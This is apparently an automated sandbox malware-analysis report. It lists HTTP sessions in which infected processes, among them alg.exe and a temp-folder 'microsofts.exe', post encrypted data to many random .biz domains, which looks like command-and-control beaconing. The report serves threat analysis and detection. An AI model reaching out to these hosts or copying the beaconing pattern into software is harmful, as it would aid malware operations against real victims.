                                                                                                                                                                                                                                                                                                          Data Ascii: T\|Gk\S$o-\peCJ/*|=7;"45p~mhOjNo=#_&zNO/Kq5|(4I~Jn2Fd@[).r/9Q$1 Wa(b=X?i/;W@\e,PoTJZ6>~fwI
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:15.246716976 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:15 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:15.280325890 CEST347OUTPOST /jae HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:15.280405045 CEST778OUTData Raw: 02 82 ad 59 40 75 07 f1 fe 02 00 00 af a1 08 5a 48 0d b9 52 84 09 62 42 46 a6 f8 54 97 e5 52 40 69 a0 1e 1b cc 34 7e eb 14 91 0a b5 71 05 65 5b 12 69 8c b4 71 7e e2 76 2c dc de 02 82 c5 bf f6 d9 22 c7 59 d1 92 de 00 e7 8e 9b 7f fd f8 c5 13 fe 29
                                                                                                                                                                                                                                                                                                          Data Ascii: Y@uZHRbBFTR@i4~qe[iq~v,"Y)7Vh>\p0:_2T418Z\x`"%dJO3bShZmJ*/z|y}\>)Uay&1X>m*AFB)4yp$bM<zM3z
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:15.397640944 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:15 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          31192.168.2.55000713.251.16.150807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:15.650444031 CEST355OUTPOST /sptkirsqxflbf HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: qaynky.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:15.650468111 CEST778OUTData Raw: e1 df bf 41 44 d0 e2 40 fe 02 00 00 a6 c7 89 49 ea b5 92 a8 ac 78 8b 99 bf af 51 a5 f1 c6 24 21 cd e4 64 4b 5c 22 37 c7 4d b5 35 f9 e0 2d fe 9c 1c a2 fc 81 2d 2a c7 82 fe 0c 2c d5 89 69 31 f5 65 7a fa f0 3e 12 4d ce 87 62 6d a1 c8 78 9e 7e 3a e8
                                                                                                                                                                                                                                                                                                          Data Ascii: AD@IxQ$!dK\"7M5--*,i1ez>Mbmx~:9`+9Nwu\'T7fv,op/N&w]Vh2Aus!baqRpP"&>YVb0aPn@ao[F`


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          32192.168.2.55001313.251.16.150807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:17.164724112 CEST343OUTPOST /v HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: qaynky.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:17.164742947 CEST778OUTData Raw: 80 02 b8 11 09 ce 66 15 fe 02 00 00 28 1c 78 51 8d d5 40 36 b2 ee 66 0f 5b f3 67 36 e0 03 9d 4f 84 87 ed 55 7a 4b d7 81 44 04 43 c2 6e b0 be 70 af c2 3b 85 c1 bf 46 7c 65 24 44 e8 92 43 5e 74 63 1a 93 6b 18 cc 02 0f 61 e6 16 0a 86 e9 f1 7c 8a 6f
                                                                                                                                                                                                                                                                                                          Data Ascii: f(xQ@6f[g6OUzKDCnp;F|e$DC^tcka|o,;4{tFp,?IBbv59u$U++r9#:Hp},3{H?b(([6``1,>"Fm?i#L,IdLRXV}
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:18.544004917 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:18 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=92a7e508a5af57b217c6f15172131ac7|8.46.123.33|1728547698|1728547698|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          33192.168.2.55001444.221.84.105807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:18.760849953 CEST359OUTPOST /iafrakxbkhxwqo HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:18.760870934 CEST778OUTData Raw: 52 d4 31 9f 2f a5 c5 0e fe 02 00 00 93 8e 7a c9 2a f0 bf 1b ab 4d c6 ec 12 07 a6 4f 92 8e 75 1a e7 1b c4 a3 75 be 8c 74 74 83 b7 8c 86 07 dc 43 f6 5f 45 f9 29 07 31 a4 86 25 fd 6a 86 ac 2f 8a ab d9 83 17 c0 59 68 19 44 eb d8 7c bc 86 dd 20 9b 54
                                                                                                                                                                                                                                                                                                          Data Ascii: R1/z*MOuuttC_E)1%j/YhD| T\._Q)`Rx>vS#%dvaJ @Z'z^ imHU9SB6I@'MxIBc(3p1]*i="q5je.k/i@@yS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:19.245417118 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:19 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=6638e573fa31beeb6bc46c84964c085c|8.46.123.33|1728547699|1728547699|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          34192.168.2.55001554.244.188.177807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:19.787439108 CEST357OUTPOST /ucrfyypmempwn HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:19.787468910 CEST778OUTData Raw: 10 29 15 9a 65 65 f0 9e fe 02 00 00 e2 d6 5b 29 4f 03 f1 a0 ae e9 80 19 a6 29 7c ed fd 38 9c 53 04 c9 3c 93 c1 af 19 c9 39 9f 0f 13 67 f9 fd 23 da bb a9 96 3a 9e 57 8f 97 50 e8 d1 7c 9e 6d 45 f5 09 bb 25 3b 94 4e 2d 9f 93 38 44 ec d4 3d 33 38 c6
                                                                                                                                                                                                                                                                                                          Data Ascii: )ee[)O)|8S<9g#:WP|mE%;N-8D=38<G^;V6Z.zE($r]+]@{L@xe5; ~i >*)nsi$~|Ii:YDC})t?HN2n{CO\^DV\SX)FE9la&
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:20.509427071 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:20 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=404b15a759480155566723bf67583b1a|8.46.123.33|1728547700|1728547700|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          35192.168.2.55001635.164.78.200807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:21.432128906 CEST352OUTPOST /oiwersrybt HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:21.432204962 CEST778OUTData Raw: 16 c1 10 1d 34 a8 d5 a3 fe 02 00 00 b6 20 01 7c b7 a8 3a f8 54 b5 75 92 12 38 95 23 fa e8 09 05 04 cf c8 3c bc fa 05 81 1f 34 46 c9 69 59 e4 f3 05 b9 06 c8 ee 30 d6 fa 13 79 2b d2 29 a1 0e 15 58 41 ce cd 0e 4e 60 f3 de f1 a2 98 98 d6 11 da de cd
                                                                                                                                                                                                                                                                                                          Data Ascii: 4 |:Tu8#<4FiY0y+)XAN`R_R''iG$sWq=vnF-,_)?dXH0gF9*aAN':z>m@n=I^_SP\<$ct`S0>~`(M|
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.140324116 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:22 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=141d816412929c48ed74d1984ecd9a2e|8.46.123.33|1728547702|1728547702|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          36192.168.2.5500173.94.10.34807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.462141991 CEST353OUTPOST /ocntklkd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.462160110 CEST778OUTData Raw: 6d 12 f4 4f e9 07 1d f9 fe 02 00 00 d8 9a a5 a4 ae b1 4c 90 5d 73 7d a0 b3 73 10 93 f3 51 08 93 0b e1 15 80 ec 2b 28 58 9a 3e 26 5c fe 3c 36 98 e9 45 6a 3f 26 e4 a4 5c e2 77 bc 86 43 84 4a d2 38 ea 90 04 9e b4 cd 17 f3 f0 36 92 b0 56 7d cd b3 79
                                                                                                                                                                                                                                                                                                          Data Ascii: mOL]s}sQ+(X>&\<6Ej?&\wCJ86V}y1X4]+c}6,6jlXR+x--P6ztC{hMZNd(POfSo4|e7sp'['Yp(9PCi>k %>Pdh,:-/^ Lx
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.918196917 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:22 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=a8f2ff8a69985d5add8dd6fb98378753|8.46.123.33|1728547702|1728547702|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          37192.168.2.55001882.112.184.19780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.473655939 CEST349OUTPOST /ndgx HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.473817110 CEST828OUTData Raw: b3 d5 dc 33 d7 1f 1a 65 30 03 00 00 eb 4d 9f 83 2d 15 0b 0f 82 b5 05 e1 8a 4e 89 5a 0a ec e3 7a 2c 65 25 0a e1 37 63 8e b4 95 e6 dd 8b e5 1a f3 4f 09 1c ef dd cd 36 be 29 b9 db a2 c4 d6 e9 de 53 0f c0 53 44 ba 95 14 0d a9 42 81 5b 1f 38 59 24 ed
                                                                                                                                                                                                                                                                                                          Data Ascii: 3e0M-NZz,e%7cO6)SSDB[8Y$x/p<h:.B~QKa$M'ujhb8IMiA=31Q/[Z`KPu%&Do&?xhL>V.[5ou5


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          38192.168.2.550019165.160.15.20807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:23.154412031 CEST355OUTPOST /libobglfegsxaj HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: myups.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:23.154422045 CEST778OUTData Raw: c8 3c dc 36 e9 3c ed 10 fe 02 00 00 19 05 42 dc ef 1b 74 5b c4 c6 0b c3 ad d5 d9 f3 95 62 6e 88 1f c5 cc 28 e0 35 26 92 d3 69 5e b3 1f ff 46 c1 a2 26 ee e2 e5 ff 6c d3 03 87 8d 06 55 8e 70 47 ff 51 8e 2b 77 63 98 23 9a ab a8 50 5e b7 21 fc fe f2
                                                                                                                                                                                                                                                                                                          Data Ascii: <6<Bt[bn(5&i^F&lUpGQ+wc#P^!D>A<-IDyl6_v^4=B6`M#a/#"/&d"L4V9GxNp}C+0"z'"!RC^xD}ua(6%@4\N>p
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:23.776515961 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:23 GMT
                                                                                                                                                                                                                                                                                                          Content-Length: 94
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:24.516083956 CEST352OUTPOST /dkwdmdeuhpg HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: myups.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:24.516129017 CEST778OUTData Raw: 9d 56 5d 65 e5 cc 52 c0 fe 02 00 00 2c ea ff d1 bf 00 27 ed f6 c5 b3 dc 4e 10 42 05 fd 10 67 b7 be 73 09 cb 8f 9a e4 57 8d ae 1f df 0b 98 69 27 5c 4e a8 f5 14 b1 80 65 88 3f 3e 4d 9d 3d b6 aa 83 db 1c 22 df 1f b5 69 cc 69 f0 2d 91 c1 10 b9 17 ee
                                                                                                                                                                                                                                                                                                          Data Ascii: V]eR,'NBgsWi'\Ne?>M="ii-HA3v.6wW]/&=#50e"^]Ouu%fW=:`0iOk LvDEkD\voHh`>mQ{ys8$;
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:24.693873882 CEST95INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:24 GMT
                                                                                                                                                                                                                                                                                                          Content-Length: 94
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:24.743076086 CEST94INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          39192.168.2.55002054.244.188.177807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:25.064795971 CEST356OUTPOST /khpdqtysqhg HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: oshhkdluh.biz
